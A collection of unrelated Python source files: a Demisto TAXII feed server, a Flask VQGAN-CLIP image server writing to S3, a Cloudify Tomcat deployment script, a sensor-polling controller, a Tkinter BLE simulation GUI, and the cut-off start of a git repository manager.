port = int(port_mapping)
else:
raise ValueError('Please provide a Listen Port.')
return port
def get_collections(params: dict = demisto.params()) -> dict:
"""
Gets the indicator query collections from the integration parameters.
"""
collections_json: str = params.get('collections', '')
try:
collections = json.loads(collections_json)
except Exception:
raise ValueError('The collections string must be a valid JSON object.')
return collections
def find_indicators_by_time_frame(indicator_query: str, begin_time: datetime, end_time: datetime) -> list:
"""
Find indicators according to a query and begin time/end time.
Args:
indicator_query: The indicator query.
begin_time: The exclusive begin time.
end_time: The inclusive end time.
Returns:
Indicator query results from Demisto.
"""
if indicator_query:
indicator_query += ' and '
else:
indicator_query = ''
if begin_time:
tz_begin_time = datetime.strftime(begin_time, '%Y-%m-%dT%H:%M:%S %z')
indicator_query += f'sourcetimestamp:>"{tz_begin_time}"'
if end_time:
indicator_query += ' and '
if end_time:
tz_end_time = datetime.strftime(end_time, '%Y-%m-%dT%H:%M:%S %z')
indicator_query += f'sourcetimestamp:<="{tz_end_time}"'
demisto.info(f'Querying indicators by: {indicator_query}')
return find_indicators_loop(indicator_query)
def find_indicators_loop(indicator_query: str):
"""
Find indicators in a loop according to a query.
Args:
indicator_query: The indicator query.
Returns:
Indicator query results from Demisto.
"""
iocs: List[dict] = []
total_fetched = 0
last_found_len = PAGE_SIZE
search_indicators = IndicatorsSearcher()
while last_found_len == PAGE_SIZE:
fetched_iocs = search_indicators.search_indicators_by_version(query=indicator_query, size=PAGE_SIZE).get('iocs')
iocs.extend(fetched_iocs)
last_found_len = len(fetched_iocs)
total_fetched += last_found_len
return iocs
def taxii_make_response(taxii_message: TAXIIMessage):
"""
Create an HTTP taxii response from a taxii message.
Args:
taxii_message: The taxii message.
Returns:
A taxii HTTP response.
"""
headers = {
'Content-Type': "application/xml",
'X-TAXII-Content-Type': 'urn:taxii.mitre.org:message:xml:1.1',
'X-TAXII-Protocol': 'urn:taxii.mitre.org:protocol:http:1.0'
}
response = make_response((taxii_message.to_xml(pretty_print=True), 200, headers))
return response
''' ROUTE FUNCTIONS '''
@APP.route('/taxii-discovery-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_discovery_service() -> Response:
"""
Route for discovery service.
"""
try:
discovery_response = SERVER.get_discovery_service(get_message_from_xml(request.data), request.headers)
except Exception as e:
error = f'Could not perform the discovery request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return taxii_make_response(discovery_response)
@APP.route('/taxii-collection-management-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_collection_management_service() -> Response:
"""
Route for collection management.
"""
try:
collection_response = SERVER.get_collections(get_message_from_xml(request.data), request.headers)
except Exception as e:
error = f'Could not perform the collection management request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return taxii_make_response(collection_response)
@APP.route('/taxii-poll-service', methods=['POST'])
@taxii_check
@validate_credentials
def taxii_poll_service() -> Response:
"""
Route for poll service.
"""
try:
taxiicontent_type = request.headers['X-TAXII-Content-Type']
if taxiicontent_type == 'urn:taxii.mitre.org:message:xml:1.1':
taxii_message = get_message_from_xml(request.data)
else:
raise ValueError('Invalid message')
except Exception as e:
error = f'Could not perform the polling request: {str(e)}'
handle_long_running_error(error)
return make_response(error, 400)
return SERVER.get_poll_response(taxii_message)
''' COMMAND FUNCTIONS '''
def test_module(taxii_server: TAXIIServer):
run_server(taxii_server, is_test=True)
return 'ok', {}, {}
def run_server(taxii_server: TAXIIServer, is_test=False):
"""
Start the taxii server.
"""
certificate_path = str()
private_key_path = str()
ssl_args = dict()
try:
if taxii_server.certificate and taxii_server.private_key and not taxii_server.http_server:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(taxii_server.certificate, 'utf-8'))
certificate_file.close()
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(taxii_server.private_key, 'utf-8'))
private_key_file.close()
context = SSLContext(PROTOCOL_TLSv1_2)
context.load_cert_chain(certificate_path, private_key_path)
ssl_args['ssl_context'] = context
demisto.debug('Starting HTTPS Server')
else:
demisto.debug('Starting HTTP Server')
wsgi_server = WSGIServer(('0.0.0.0', taxii_server.port), APP, **ssl_args, log=DEMISTO_LOGGER)
if is_test:
server_process = Process(target=wsgi_server.serve_forever)
server_process.start()
time.sleep(5)
server_process.terminate()
else:
demisto.updateModuleHealth('')
wsgi_server.serve_forever()
except SSLError as e:
ssl_err_message = f'Failed to validate certificate and/or private key: {str(e)}'
handle_long_running_error(ssl_err_message)
raise ValueError(ssl_err_message)
except Exception as e:
handle_long_running_error(f'An error occurred: {str(e)}')
raise ValueError(str(e))
finally:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
def main():
"""
Main
"""
params = demisto.params()
command = demisto.command()
port = get_port(params)
collections = get_collections(params)
server_links = demisto.demistoUrls()
server_link_parts: ParseResult = urlparse(server_links.get('server'))
certificate: str = params.get('certificate', '')
private_key: str = params.get('key', '')
credentials: dict = params.get('credentials', None)
http_server = True
if (certificate and not private_key) or (private_key and not certificate):
raise ValueError('When using HTTPS connection, both certificate and private key must be provided.')
elif certificate and private_key:
http_server = False
global SERVER
scheme = 'http'
host_name = server_link_parts.hostname
if not http_server:
scheme = 'https'
service_address = params.get('service_address')
SERVER = TAXIIServer(scheme, str(host_name), port, collections,
certificate, private_key, http_server, credentials, service_address)
demisto.debug(f'Command being called is {command}')
commands = {
'test-module': test_module
}
try:
if command == 'long-running-execution':
run_server(SERVER)
else:
readable_output, outputs, raw_response = commands[command](SERVER)
return_outputs(readable_output, outputs, raw_response)
except Exception as e:
err_msg = f'Error in {INTEGRATION_NAME} Integration [{e}]'
return_error(err_msg)
if __name__ in ['__main__', '__builtin__', 'builtins']:
main()
|
server.py
|
# This standalone server is adapted from the worker code,
# but is meant to work in a standalone fashion without the
# need for a central server. Results are written to s3.
# testing with curl
# curl -H "Content-Type: application/json" -d '{"id": "asdf", "text_prompt": "A cute cartoon frog", "iterations": 100}' http://localhost:5000/image
import requests
import sys
import os
from types import SimpleNamespace
import time
import json
from api_client import AIBrushAPI
import base64
import traceback
import flask
import boto3
import threading
BUCKET = "aibrush-test"
from vqgan_clip.generate import run, default_args
def cleanup():
# delete all files in the current folder ending in .png or .backup
for fname in os.listdir("."):
if fname.endswith(".png"):
os.remove(fname)
# flask api
app = flask.Flask(__name__)
# create image endpoint
@app.route('/image', methods=['POST'])
def create_image():
# get payload
payload = flask.request.get_json()
t = threading.Thread(target=handle_create, args=(payload,))
t.start()
return "OK"
def handle_create(payload):
args = SimpleNamespace(**default_args().__dict__)
# get image id
image_id = payload["id"]
# get image data
image_data = None
if "image_data" in payload:
image_data = payload["image_data"]
# decode image data
image_data = base64.decodebytes(image_data.encode("utf-8"))
with open(f"{image_id}-init.png", "wb") as f:
f.write(image_data)
args.init_image = f"{image_id}-init.png"
# get text prompt
args.prompts = payload["text_prompt"]
# get iterations
iterations = payload["iterations"]
args.max_iterations = iterations
args.output = f"{image_id}.png"
run(args)
# get output image
with open(f"{image_id}.png", "rb") as f:
image_data = f.read()
# write image data to s3
s3 = boto3.resource('s3')
s3.Bucket(BUCKET).put_object(Key=f"{image_id}.png", Body=image_data)
cleanup()
# start flask server
if __name__ == '__main__':
app.run(host="0.0.0.0", port=5000)
|
_a4c_post_configure_source.py
|
from cloudify import ctx
from cloudify.exceptions import NonRecoverableError
from cloudify.state import ctx_parameters as inputs
import subprocess
import os
import re
import sys
import time
import threading
import platform
from StringIO import StringIO
from cloudify_rest_client import CloudifyClient
from cloudify import utils
if 'MANAGER_REST_PROTOCOL' in os.environ and os.environ['MANAGER_REST_PROTOCOL'] == "https":
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port(), protocol='https', trust_all=True)
else:
client = CloudifyClient(host=utils.get_manager_ip(), port=utils.get_manager_rest_service_port())
def convert_env_value_to_string(envDict):
for key, value in envDict.items():
envDict[str(key)] = str(envDict.pop(key))
def get_attribute_user(ctx):
if get_attribute(ctx, 'user'):
return get_attribute(ctx, 'user')
else:
return get_attribute(ctx, 'cloudify_agent')['user']
def get_attribute_key(ctx):
if get_attribute(ctx, 'key'):
return get_attribute(ctx, 'key')
else:
return get_attribute(ctx, 'cloudify_agent')['key']
def get_host(entity):
if entity.instance.relationships:
for relationship in entity.instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target
return None
def has_attribute_mapping(entity, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, entity.node.properties))
mapping_configuration = entity.node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def process_attribute_mapping(entity, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = entity.node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(entity, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and entity.instance.relationships:
for relationship in entity.instance.relationships:
if mapping_configuration['parameters'][1] in relationship.type_hierarchy:
return data_retriever_function(relationship.target, mapping_configuration['parameters'][2])
return ""
def get_nested_attribute(entity, attribute_names):
deep_properties = get_attribute(entity, attribute_names[0])
attribute_names_iter = iter(attribute_names)
next(attribute_names_iter)
for attribute_name in attribute_names_iter:
if deep_properties is None:
return ""
else:
deep_properties = deep_properties.get(attribute_name, None)
return deep_properties
def _all_instances_get_nested_attribute(entity, attribute_names):
return None
def get_attribute(entity, attribute_name):
if has_attribute_mapping(entity, attribute_name):
# First check if any mapping exist for attribute
mapped_value = process_attribute_mapping(entity, attribute_name, get_attribute)
ctx.logger.info('Mapping exists for attribute {0} with value {1}'.format(attribute_name, mapped_value))
return mapped_value
# No mapping exist, try to get directly the attribute from the entity
attribute_value = entity.instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
ctx.logger.info('Found the attribute {0} with value {1} on the node {2}'.format(attribute_name, attribute_value, entity.node.id))
return attribute_value
# Attribute retrieval fails, fall back to property
property_value = entity.node.properties.get(attribute_name, None)
if property_value is not None:
return property_value
# Property retrieval fails, fall back to host instance
host = get_host(entity)
if host is not None:
ctx.logger.info('Attribute not found {0} go up to the parent node {1}'.format(attribute_name, host.node.id))
return get_attribute(host, attribute_name)
# Nothing is found
return ""
def _all_instances_get_attribute(entity, attribute_name):
result_map = {}
# get all instances data using cfy rest client
# we have to get the node using the rest client with node_instance.node_id
# then we will have the relationships
node = client.nodes.get(ctx.deployment.id, entity.node.id)
all_node_instances = client.node_instances.list(ctx.deployment.id, entity.node.id)
for node_instance in all_node_instances:
prop_value = __recursively_get_instance_data(node, node_instance, attribute_name)
if prop_value is not None:
ctx.logger.info('Found the property/attribute {0} with value {1} on the node {2} instance {3}'.format(attribute_name, prop_value, entity.node.id,
node_instance.id))
result_map[node_instance.id + '_'] = prop_value
return result_map
def get_property(entity, property_name):
# Try to get the property value on the node
property_value = entity.node.properties.get(property_name, None)
if property_value is not None:
ctx.logger.info('Found the property {0} with value {1} on the node {2}'.format(property_name, property_value, entity.node.id))
return property_value
# No property found on the node, fall back to the host
host = get_host(entity)
if host is not None:
ctx.logger.info('Property not found {0} go up to the parent node {1}'.format(property_name, host.node.id))
return get_property(host, property_name)
return ""
def get_instance_list(node_id):
result = ''
all_node_instances = client.node_instances.list(ctx.deployment.id, node_id)
for node_instance in all_node_instances:
if len(result) > 0:
result += ','
result += node_instance.id
return result
def get_host_node_name(instance):
for relationship in instance.relationships:
if 'cloudify.relationships.contained_in' in relationship.type_hierarchy:
return relationship.target.node.id
return None
def __get_relationship(node, target_name, relationship_type):
for relationship in node.relationships:
if relationship.get('target_id') == target_name and relationship_type in relationship.get('type_hierarchy'):
return relationship
return None
def __has_attribute_mapping(node, attribute_name):
ctx.logger.info('Check if it exists mapping for attribute {0} in {1}'.format(attribute_name, node.properties))
mapping_configuration = node.properties.get('_a4c_att_' + attribute_name, None)
if mapping_configuration is not None:
if mapping_configuration['parameters'][0] == 'SELF' and mapping_configuration['parameters'][1] == attribute_name:
return False
else:
return True
return False
def __process_attribute_mapping(node, node_instance, attribute_name, data_retriever_function):
# This is where attribute mapping is defined in the cloudify type
mapping_configuration = node.properties['_a4c_att_' + attribute_name]
ctx.logger.info('Mapping configuration found for attribute {0} is {1}'.format(attribute_name, mapping_configuration))
# If the mapping configuration exist and if it concerns SELF then just get attribute of the mapped attribute name
# Else if it concerns TARGET then follow the relationship and retrieved the mapped attribute name from the TARGET
if mapping_configuration['parameters'][0] == 'SELF':
return data_retriever_function(node, node_instance, mapping_configuration['parameters'][1])
elif mapping_configuration['parameters'][0] == 'TARGET' and node_instance.relationships:
for rel in node_instance.relationships:
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if mapping_configuration['parameters'][1] in relationship.get('type_hierarchy'):
target_instance = client.node_instances.get(rel.get('target_id'))
target_node = client.nodes.get(ctx.deployment.id, target_instance.node_id)
return data_retriever_function(target_node, target_instance, mapping_configuration['parameters'][2])
return None
def __recursively_get_instance_data(node, node_instance, attribute_name):
if __has_attribute_mapping(node, attribute_name):
return __process_attribute_mapping(node, node_instance, attribute_name, __recursively_get_instance_data)
attribute_value = node_instance.runtime_properties.get(attribute_name, None)
if attribute_value is not None:
return attribute_value
elif node_instance.relationships:
for rel in node_instance.relationships:
# on rel we have target_name, target_id (instanceId), type
relationship = __get_relationship(node, rel.get('target_name'), rel.get('type'))
if 'cloudify.relationships.contained_in' in relationship.get('type_hierarchy'):
parent_instance = client.node_instances.get(rel.get('target_id'))
parent_node = client.nodes.get(ctx.deployment.id, parent_instance.node_id)
return __recursively_get_instance_data(parent_node, parent_instance, attribute_name)
return None
else:
return None
def download(child_rel_path, child_abs_path, download_dir):
artifact_downloaded_path = ctx.download_resource(child_abs_path)
new_file = os.path.join(download_dir, child_rel_path)
new_file_dir = os.path.dirname(new_file)
if not os.path.exists(new_file_dir):
os.makedirs(new_file_dir)
os.rename(artifact_downloaded_path, new_file)
ctx.logger.info('Downloaded artifact from path ' + child_abs_path + ', it\'s available now at ' + new_file)
return new_file
def download_artifacts(artifacts, download_dir):
downloaded_artifacts = {}
os.makedirs(download_dir)
for artifact_name, artifact_ref in artifacts.items():
ctx.logger.info('Download artifact ' + artifact_name)
if isinstance(artifact_ref, basestring):
downloaded_artifacts[artifact_name] = download(os.path.basename(artifact_ref), artifact_ref, download_dir)
else:
child_download_dir = os.path.join(download_dir, artifact_name)
for child_path in artifact_ref:
download(child_path['relative_path'], child_path['absolute_path'], child_download_dir)
downloaded_artifacts[artifact_name] = child_download_dir
return downloaded_artifacts
env_map = {}
env_map['TARGET_NODE'] = ctx.target.node.id
env_map['TARGET_INSTANCE'] = ctx.target.instance.id
env_map['TARGET_INSTANCES'] = get_instance_list(ctx.target.node.id)
env_map['SOURCE_NODE'] = ctx.source.node.id
env_map['SOURCE_INSTANCE'] = ctx.source.instance.id
env_map['SOURCE_INSTANCES'] = get_instance_list(ctx.source.node.id)
env_map['A4C_EXECUTION_HOST'] = get_attribute(ctx.source, 'ip_address')
env_map['A4C_EXECUTION_USER'] = get_attribute_user(ctx.source)
env_map['A4C_EXECUTION_KEY'] = get_attribute_key(ctx.source)
env_map['CONTEXT_PATH'] = r'helloworld'
env_map['TOMCAT_HOME'] = r'/opt/tomcat'
node_artifacts = {
"war_file": "_a4c_artifact/War/war_file/helloWorld.war"
}
relationship_artifacts = {
"properties_file": "_a4c_artifact/War/warHostedOnTomcatWithPropertiesTomcat/properties_file/settings.properties"
}
artifacts = node_artifacts.copy()
artifacts.update(relationship_artifacts)
download_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'downloads')
env_map.update(download_artifacts(artifacts, download_dir))
if inputs.get('process', None) is not None and inputs['process'].get('env', None) is not None:
ctx.logger.info('Operation is executed with environment variable {0}'.format(inputs['process']['env']))
env_map.update(inputs['process']['env'])
def parse_output(output):
# by convention, the last output is the result of the operation
last_output = None
outputs = {}
pattern = re.compile('EXPECTED_OUTPUT_(\w+)=(.*)')
for line in output.splitlines():
match = pattern.match(line)
if match is None:
last_output = line
else:
output_name = match.group(1)
output_value = match.group(2)
outputs[output_name] = output_value
return {'last_output': last_output, 'outputs': outputs}
def execute(script_path, process, outputNames, command_prefix=None, cwd=None):
os.chmod(script_path, 0755)
on_posix = 'posix' in sys.builtin_module_names
env = os.environ.copy()
process_env = process.get('env', {})
env.update(process_env)
if outputNames is not None:
env['EXPECTED_OUTPUTS'] = outputNames
if platform.system() == 'Windows':
wrapper_path = ctx.download_resource("scriptWrapper.bat")
else:
wrapper_path = ctx.download_resource("scriptWrapper.sh")
os.chmod(wrapper_path, 0755)
command = '{0} {1}'.format(wrapper_path, script_path)
else:
command = script_path
if command_prefix is not None:
command = "{0} {1}".format(command_prefix, command)
ctx.logger.info('Executing: {0} in env {1}'.format(command, env))
process = subprocess.Popen(command,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
env=env,
cwd=cwd,
bufsize=1,
close_fds=on_posix)
return_code = None
stdout_consumer = OutputConsumer(process.stdout)
stderr_consumer = OutputConsumer(process.stderr)
while True:
return_code = process.poll()
if return_code is not None:
break
time.sleep(0.1)
stdout_consumer.join()
stderr_consumer.join()
parsed_output = parse_output(stdout_consumer.buffer.getvalue())
if outputNames is not None:
outputNameList = outputNames.split(';')
for outputName in outputNameList:
ctx.logger.info('Ouput name: {0} value : {1}'.format(outputName, parsed_output['outputs'].get(outputName, None)))
if return_code != 0:
error_message = "Script {0} encountered error with return code {1} and standard output {2}, error output {3}".format(command, return_code,
stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
error_message = str(unicode(error_message, errors='ignore'))
ctx.logger.error(error_message)
raise NonRecoverableError(error_message)
else:
ok_message = "Script {0} executed normally with standard output {1} and error output {2}".format(command, stdout_consumer.buffer.getvalue(),
stderr_consumer.buffer.getvalue())
ok_message = str(unicode(ok_message, errors='ignore'))
ctx.logger.info(ok_message)
return parsed_output
class OutputConsumer(object):
def __init__(self, out):
self.out = out
self.buffer = StringIO()
self.consumer = threading.Thread(target=self.consume_output)
self.consumer.daemon = True
self.consumer.start()
def consume_output(self):
for line in iter(self.out.readline, b''):
self.buffer.write(line)
self.out.close()
def join(self):
self.consumer.join()
new_script_process = {'env': env_map}
operationOutputNames = None
convert_env_value_to_string(new_script_process['env'])
parsed_output = execute(ctx.download_resource('_a4c_impl_artifact/War_Tomcat/warHostedOnTomcatWithPropertiesTomcat/tosca.interfaces.relationship.Configure/post_configure_source/tomcat_install_war.sh'), new_script_process, operationOutputNames)
outputs = parsed_output['outputs'].items()
for k,v in outputs:
ctx.logger.info('Output name: {0} value: {1}'.format(k, v))
ctx.source.instance.runtime_properties['_a4c_OO:tosca.interfaces.relationship.Configure:post_configure_source:{0}'.format(k)] = v
ctx.source.instance.runtime_properties['application_url'] = r'http://' + get_attribute(ctx.source, 'public_ip_address') + r':' + r'80' + r'/' + r'helloworld'
ctx.source.instance.runtime_properties['local_application_url'] = r'http://' + get_attribute(ctx.source, 'ip_address') + r':' + r'80' + r'/' + r'helloworld'
ctx.source.instance.update()
ctx.target.instance.runtime_properties['server_url'] = r'http://' + get_attribute(ctx.target, 'public_ip_address') + r':' + r'80'
ctx.target.instance.update()
|
controller.py
|
import logging
from threading import Thread
import time
from monitor.sensors import AbstractSensor
from monitor.repository import AbstractRepository
LOG = logging.getLogger('monitor_logger')
class Controller:
'''
Controller for sensors.
'''
def __init__(self, repo: AbstractRepository):
self.repo = repo
self._sensors: list[AbstractSensor] = []
self._polling_threads: list[Thread] = []
@property
def sensors(self):
return self._sensors
def add_sensor(self, sensor: AbstractSensor):
'''
Add a sensor to the list of sensors.
:param sensor: sensor to add
'''
self._sensors.append(sensor)
LOG.info('Added sensor - [{}]'.format(sensor.sensor_id))
def remove_sensor(self, sensor: AbstractSensor):
'''
Remove a sensor from the list of sensors.
:param sensor: sensor to remove
'''
try:
self._sensors.remove(sensor)
LOG.info('Removed sensor - [{}]'.format(sensor.sensor_id))
except ValueError:
LOG.error('Sensor not found - [{}]'.format(sensor.sensor_id))
def start_polling(self, polling_interval: float = 2):
'''
Start polling sensors in a separate thread.
:param polling_interval: polling interval in seconds
'''
LOG.info('Starting polling sensors with interval - [{}]'.format(polling_interval))
self.running = True
for sensor in self._sensors:
t = Thread(target=self.poll_sensor, args=(sensor,))
t.start()
self._polling_threads.append(t)
def poll_sensor(self, sensor: AbstractSensor):
'''
Poll sensors in a separate thread.
:param polling_interval: polling interval in seconds
'''
polling_interval = sensor.polling_interval
while True and self.running:
LOG.info('Polling sensor - [{}] with interval - [{}]'.format(sensor.sensor_id, polling_interval))
start = time.time()
measurement = sensor.get_measurement()
stop = time.time()
self.repo.add_measurement(measurement)
time.sleep(polling_interval - (stop - start))
def stop_polling(self):
'''
Stop polling sensors.
'''
self.running = False
LOG.info('Stopping polling sensors')
for t in self._polling_threads:
t.join()
self._polling_threads = []
LOG.info('Polling sensors stopped')
|
gui.py
|
from tkinter import *
from tkinter.font import *
from guiExtensions.tk_extensions import ScrollableTV
### imports for running simulation
import csv
import time
import threading
root = Tk()
root.resizable(0, 0)
root.title("ble-simulation")
ff10=Font(family="Consolas", size=10)
ff10b=Font(family="Consolas", size=10, weight=BOLD)
CURRENT_SIMULATION = "simulations/fullBLE5.csv"
#### Attack Model Selection Menu...
def initNoAttackSim():
global CURRENT_SIMULATION
CURRENT_SIMULATION = "simulations/fullBLE5.csv"
print("executing {}".format(CURRENT_SIMULATION))
def initWhitelistSim():
global CURRENT_SIMULATION
CURRENT_SIMULATION = "simulations/BLEWhitelist.csv"
print("executing {}".format(CURRENT_SIMULATION))
menu = Menu(root)
root.config(menu=menu)
subMenu = Menu(menu)
menu.add_cascade(label="Attack Models", menu=subMenu)
sec0SubMenu = Menu(subMenu)
sec1SubMenu = Menu(subMenu)
sec2SubMenu = Menu(subMenu)
subMenu.add_cascade(label="Security Level 0", menu=sec0SubMenu)
subMenu.add_cascade(label="Security Level 1", menu=sec1SubMenu)
sec0SubMenu.add_command(label="no attacks", command=initNoAttackSim)
sec1SubMenu.add_command(label="whitelists", command=initWhitelistSim)
### importing image assets
masterFrame =Frame(root)
masterFrame.grid(row=0)
winH = 420
winW = 580
ncols = 10
nrows = 10
cellW = winW / ncols
cellH = winH / nrows
### Grid for node layout
class Node:
def __init__(self, row, col):
self.row = row
self.col = col
return
def generatGrid(nrows, ncols):
grid = []
for r in range(nrows):
row = [ Node(r, c) for c in range(ncols) ]
grid.append(row)
return grid
def drawNode(canvas, node):
x1 = cellW * node.col
y1 = cellH * node.row
x2 = x1 + cellW
y2 = y1 + cellH
canvas.create_rectangle(x1, y1, x2, y2)
return
def create_circle(x, y, r, canvas, fill="#5ED0E9"): #center coordinates, radius
x0 = x - r
y0 = y - r
x1 = x + r
y1 = y + r
return canvas.create_oval(x0, y0, x1, y1, fill=fill)
def drawGrid(canvas, grid):
for row in grid:
for node in row:
drawNode(canvas, node)
return
canvas = Canvas(masterFrame, width=winW, height=winH,
borderwidth=0, highlightthickness=0, bg="white")
canvas.grid( row=0, column=0, sticky=EW)
# init a scrollabletv for packet transfers...
bottomMasterFrame = Frame(root)
bottomMasterFrame.grid(row=1)
tv1=ScrollableTV(bottomMasterFrame, selectmode=BROWSE, height=4, show="tree headings", columns=("Time", "Sensor", "Task", "Payload"), style="Foo2.Treeview")
tv1.heading("Time", text="Time", anchor=W)
tv1.heading("Sensor", text="Sensor", anchor=W)
tv1.heading("Task", text="Task", anchor=W)
tv1.heading("Payload", text="Payload", anchor=W)
tv1.column("#0", width=0, stretch=False)
tv1.column("Time", width=100, stretch=False)
tv1.column("Sensor", width=100, stretch=False)
tv1.column("Task", width=100, stretch=False)
tv1.column("Payload", minwidth=1400, width=680, stretch=True)
tv1.grid(row=2, column=0, padx=8, pady=(8,0))
# style config. use a ScrollableStyle and pass in the ScrollableTV whose configure needs to be managed. if you had more than one ScrollableTV, you could modify ScrollableStyle to store a list of them and operate configure on each of them
s1=ScrollableTV.ScrollableStyle(tv1)
s1.configure("Foo2.Treeview", font=ff10, padding=1)
s1.configure("Foo2.Treeview.Heading", font=ff10b, padding=1)
# init a scrollbar
sb1=Scrollbar(bottomMasterFrame, orient=HORIZONTAL)
sb1.grid(row=3, sticky=EW, padx=8, pady=(0,8))
tv1.configure(xscrollcommand=sb1.set)
sb1.configure(command=tv1.xview)
sideContentFrame = Frame(masterFrame)
sideContentFrame.grid( row = 0, column=1)
## init a scrollabletv for output table of sensor events
tv2=ScrollableTV(sideContentFrame, selectmode=BROWSE, height=13, show="tree headings", columns=("Time", "Sensor", "Message"), style="Foo2.Treeview")
tv2.heading("Time", text="Time", anchor=W)
tv2.heading("Sensor", text="Sensor", anchor=W)
tv2.heading("Message", text="Message", anchor=W)
tv2.column("#0", width=0, stretch=False)
tv2.column("Time", width=80, stretch=False)
tv2.column("Sensor", width=80, stretch=False)
tv2.column("Message", minwidth=1400, width=220, stretch=True)
tv2.grid(padx=8, pady=(8,0))
s2=ScrollableTV.ScrollableStyle(tv2)
s2.configure("Foo2.Treeview", font=ff10, padding=1)
s2.configure("Foo2.Treeview.Heading", font=ff10b, padding=1)
# init a scrollbar
sb2=Scrollbar(sideContentFrame, orient=HORIZONTAL)
sb2.grid(row=1, sticky=EW, padx=8, pady=(0,8))
tv2.configure(xscrollcommand=sb2.set)
sb2.configure(command=tv2.xview)
### creation of grid
grid = generatGrid(nrows, ncols)
drawGrid(canvas, grid)
### sensor base station connection
sensorBaseConnection = canvas.create_line(160, 300, 380, 100, fill='grey', width=4, dash=(12, 1))
### base station alarm connection
baseAlarmConnection = canvas.create_line(160, 300, 400, 300, fill='black', width=4, dash=(12, 1))
# ### creating alarm
alarm = PhotoImage(file="image-assets/alarm.png")
# ### creating sensor
sensor = PhotoImage(file="image-assets/sensor.png")
# ### creating base station
base_station = PhotoImage(file="image-assets/base-station.png")
canvas.create_image(400, 300, image=alarm)
canvas.create_image(380, 100, image=sensor )
canvas.create_image(160, 300, image=base_station )
def refresh():
while True:
root.update()
def runSim():
with open(CURRENT_SIMULATION, "r") as f:
reader = csv.reader(f)
prevDuration = 0.0
for i, line in enumerate(reader):
root.update()
time.sleep(float(line[0])-prevDuration)
prevDuration = float(line[0])
root.update()
if line[1] == "node_state":
tv2.insert("", END, values=(str(line[2]), str(line[3]), str(line[4])))
root.update()
else:
tv1.insert("", END, values=(str(line[2]), str(line[3]), str(line[4]), str(line[5])))
root.update()
tv2.insert("", END, values=("", "", "Simulation complete"))
tv1.insert("", END, values=("", "","","Simulation complete"))
### control menu button onclick methods
def start():
print("starting sim")
global t2
t1 = threading.Thread(target=refresh, args=[])
t2 = threading.Thread(target=runSim, args=[])
t1.start()
t2.start()
### simulation control frame
rootFrame= Frame(sideContentFrame)
rootFrame.grid(row=2)
topFrame = Frame(rootFrame, bg="grey", width=380, height=60)
topFrame.grid(row=0)
topInnerFrame1 = Frame(topFrame, width=126, height=60)
topInnerFrame1.grid(row=0, column=0)
startbutton = Button(topInnerFrame1, text="Start", fg="black", bg="grey", command=start)
startbutton.grid(padx=23, pady=5)
root.mainloop()
|
repo_manager.py
|
# ===============================================================================
# Copyright 2013 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import hashlib
import os
import shutil
import subprocess
import sys
import time
from datetime import datetime
import git
from git import Repo
from git.exc import GitCommandError
from traits.api import Any, Str, List, Event
from pychron.core.helpers.filetools import fileiter
from pychron.core.progress import open_progress
from pychron.envisage.view_util import open_view
from pychron.git_archive.diff_view import DiffView, DiffModel
from pychron.git_archive.git_objects import GitSha
from pychron.git_archive.history import BaseGitHistory
from pychron.git_archive.merge_view import MergeModel, MergeView
from pychron.git_archive.utils import get_head_commit, ahead_behind, from_gitlog, LOGFMT
from pychron.git_archive.views import NewBranchView
from pychron.loggable import Loggable
from pychron.pychron_constants import DATE_FORMAT, NULL_STR
from pychron.updater.commit_view import CommitView
def get_repository_branch(path):
r = Repo(path)
b = r.active_branch
return b.name
def grep(arg, name):
process = subprocess.Popen(["grep", "-lr", arg, name], stdout=subprocess.PIPE)
stdout, stderr = process.communicate()
return stdout, stderr
def format_date(d):
return time.strftime("%m/%d/%Y %H:%M", time.gmtime(d))
def isoformat_date(d):
if isinstance(d, (float, int)):
d = datetime.fromtimestamp(d)
return d.strftime(DATE_FORMAT)
# return time.mktime(time.gmtime(d))
class StashCTX(object):
def __init__(self, repo):
self._repo = repo
self._error = None
def __enter__(self):
try:
self._repo.git.stash()
except GitCommandError as e:
self._error = e
return e
def __exit__(self, *args, **kw):
if not self._error:
try:
self._repo.git.stash("pop")
except GitCommandError:
pass
class GitRepoManager(Loggable):
"""
manage a local git repository
"""
_repo = Any
# root=Directory
path = Str
selected = Any
selected_branch = Str
selected_path_commits = List
selected_commits = List
refresh_commits_table_needed = Event
path_dirty = Event
remote = Str
def set_name(self, p):
self.name = "{}<GitRepo>".format(os.path.basename(p))
def open_repo(self, name, root=None):
